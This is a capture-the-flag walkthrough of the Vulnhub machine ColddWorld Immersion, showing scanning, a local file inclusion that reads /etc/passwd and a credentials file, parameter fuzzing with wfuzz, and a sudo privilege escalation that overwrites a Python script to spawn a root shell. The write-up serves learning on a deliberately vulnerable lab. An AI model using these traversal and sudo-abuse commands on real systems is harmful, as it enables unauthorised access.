Welcome to ColddWorld Immersion Walkthrough – Vulnhub – Writeup. The machine is an easy machine to complete the boot to root challenge.
Link to the machine: https://www.vulnhub.com/entry/colddworld-immersion,668/
Identify the target
Firstly, I had to identify the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
Scan open ports
Now that I have identified the IP address of the target, I can scan for open ports to identify exposed services.
nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.12 -oN immersion.nmap
From the screenshot above, we can see that there are HTTP and SSH services available. However, the port for SSH is 3042 instead of the usual 22. So, I decided to enumerate the webserver.
Enumerate web server
gobuster dir -u http://10.0.2.12 -x txt,php,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
I looked into all paths and on the page /login, we have an interesting finding.
When I clicked the login, it redirected me to another page /accounts.php. Furthermore, I looked at the source of the login page and found out that the page might have a Local File Inclusions (LFI) vulnerability.
The HTML comments say that there is a credentials file ‘carls.txt’ inside the directory /var. Likewise, the comment has a quoted page that might suggest the parameter that has LFI. Therefore, I tried the exploit as follows.
Since the HTML only renders a new line with the tag <br>, it is good to view the source of the page for proper output.
However, suppose if I hadn’t taken the hint for the get parameter, I should do fuzzing. To do fuzzing, we have a lot of tools, however, I prefer wfuzz. In wfuzz, it requires a FUZZ word that is tested with different words. Firstly, we have to run it without flags that would hide some results. Then, we have to add an extra option to hide unwanted results.
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.12/login/account.php?FUZZ=../../../../../etc/passwd
As you can see above, the page has 0 characters with the tried options. This means that those are not the parameters that we are looking for. Hence, we can change hide these results.
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.12/login/account.php?FUZZ=../../../../../etc/passwd --hh 0
Like we saw above, when tested with parameter “page”, we got different results. That’s how we have to identify the parameters when there aren’t any hints. However, in our case, there was a clear hint in the HTML comments.
Now that we know the way to get file inclusions, we can use the same technique to get the carls.txt file.
I got the username and password but they didn’t work on the SSH service and the login page. However, when I decoded the password using base64, I got the real password.
echo Y2FybG9z | base64 -d
Then, I logged in to the SSH server.
ssh email@example.com -p 3042
Getting user privileges
Since I am inside the machine, my goal is to get the flags. I didn’t find the flag inside the directory of the user ‘carls’. So, I checked the sudo permissions of the user.
We can see that the user carls can run bash on the user c0ldd that is what we exactly needed.
sudo -u c0ldd /bin/bash cd /home/c0ldd cat user.txt cat user.txt | base64 -d && echo
Finally, we got our first flag.
Getting root’s privileges
Next, we have to get the root access. Therefore, I looked at the sudo permissions of the user c0ldd.
The user can execute a python script named “DoNotRun.py” as root. Thus, we have to change the content of the script to something that would get us a root shell. Therefore, I looked at the content of the python file and the permissions on it.
cat DoNotRun.py ls -al
The script simply printed a text infinitely. Likewise, the file is owned by root and other users won’t have access to write on it. However, since we have access to this directory, we can delete this file and create a file of the same name with the required content.
echo 'import os;os.system("/bin/bash")' > DoNotRun.py cat DoNotRun.py
Finally, I ran the command as sudo and got the root shell and the flag.
sudo python3 /home/c0ldd/DoNotRun.py id cd /root ls -al cat root.txt cat root.txt | base64 -d && echo
This is an easy machine for a beginner to start learning about LFI and sudo abusing.